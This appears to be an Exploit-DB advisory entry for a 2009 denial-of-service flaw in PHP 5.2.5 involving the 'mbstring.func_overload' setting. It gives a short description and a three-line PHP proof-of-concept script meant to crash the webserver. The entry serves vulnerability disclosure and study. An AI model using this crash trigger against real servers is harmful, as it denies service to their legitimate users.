PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service

EDB-ID:

32769


Author:

strategma

Type:

dos


Platform:

PHP

Date:

2009-01-30


source: https://www.securityfocus.com/bid/33542/info

PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.

Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users. 

<?php
        $v = 'Òîâà å òåñò|test.php';
        print substr($v,0,strpos($v,'|'));
?>